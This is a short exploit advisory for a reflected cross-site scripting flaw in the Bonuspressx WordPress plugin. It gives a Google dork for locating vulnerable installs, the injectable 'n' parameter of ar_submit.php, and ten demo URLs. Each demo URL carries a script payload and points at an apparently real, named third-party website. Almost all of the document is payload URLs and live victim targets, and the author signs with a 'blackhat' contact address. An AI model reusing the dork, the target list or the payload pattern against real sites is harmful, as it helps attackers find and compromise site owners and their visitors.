############################################
[+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7 , Mozilla FireFox
############################################
[+]  Exploit : Cross Site Scripting
[+]  Location :
[Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS]
############################################

[+]  Demo :

#  
http://megabon.us/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://dsimple.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://cachkiemtienonline.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://markcall.com/bonus/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://onlinekarrier.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://imhoangtram.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://imakingmoney.net/blog/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://senukeinferno.com//wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://emarky.net/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  
http://viraloptins.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


############################################

Discovered By : Milad Hacking & Cyber Injector

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5


############################################